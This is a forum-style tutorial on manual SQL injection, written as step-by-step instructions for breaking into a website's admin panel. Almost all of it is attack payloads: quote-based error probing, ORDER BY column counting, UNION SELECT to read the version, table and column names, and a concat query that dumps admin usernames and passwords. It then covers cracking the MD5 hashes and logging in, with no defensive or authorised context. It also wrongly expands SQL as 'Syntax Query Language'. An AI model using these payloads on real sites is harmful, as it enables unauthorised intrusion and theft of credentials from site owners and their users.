Basic Manual Sql Injection Tutorial

Hello Friends, This Is Basic Manual Sql Injection Tutorial For All Of You!

Sqli Means For "Syntax Query Language Injection". SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.


Steps To Exploit:

1. First you need to find vulnerable website.
http://example.com/index.php?id=15


2. To check if the site is vulnerable or not add ' After The Id.
http://example.com/index.php?id=15'


3. Now you need to find columns.
To find we will add "order by 1--" You can add any other digit. Keep Changing the digit until it shows error.
http://example.com/index.php?id=15 order by 1--
http://example.com/index.php?id=15 order by 2--
http://example.com/index.php?id=15 order by 3--
http://example.com/index.php?id=15 order by 4--
http://example.com/index.php?id=15 order by 5--
http://example.com/index.php?id=15 order by 6--

Error`s looks like this:
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '\'39' at
line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=\'39


4. Now Select columns
Columns is 5.
Your Scene Will Be Diiferent So Keep changing the digit until columns come.
http://example.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5--


5. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1
http://example.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5--
you got the version like this:
5.0.32-Debian_7etch11-log


6. Finding Tables
http://example.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables--
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.


7. Finding Columns in the Table ADMINS.
http://example.com/index.php?id=15 UNION ALL SELECT
column_name,2,3,4,5 from information_schema.columns where
table_name=char()--


We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)--
http://example.com/index.php?id=15 UNION ALL SELECT
column_name,2,3,4,5 from information_schema.columns where
table_name=char(65,68,77,73,78,83)--
And you will got the columns in table ADMINS
There need to have columns with names: username and password


8. Getting username and password.
Now we put concat(username,0x3a,password) and admins
http://example.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins--
( 0x3a is ASCII )


9. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Crackers.
If password is not hash you are lucky and now you need to find admin panel.


10. Finding Admin Panel
Open the tool Admin Finder
Put the website in the bellow and click Scan.


So you found admin panel and it looks like this http://example.com/admin/login.php
You open website and there have Username: Password:
Put username and password what you got.


Done you login in Admin Panel.
Now you can do whatever you want.
Hope It Helps You. Tongue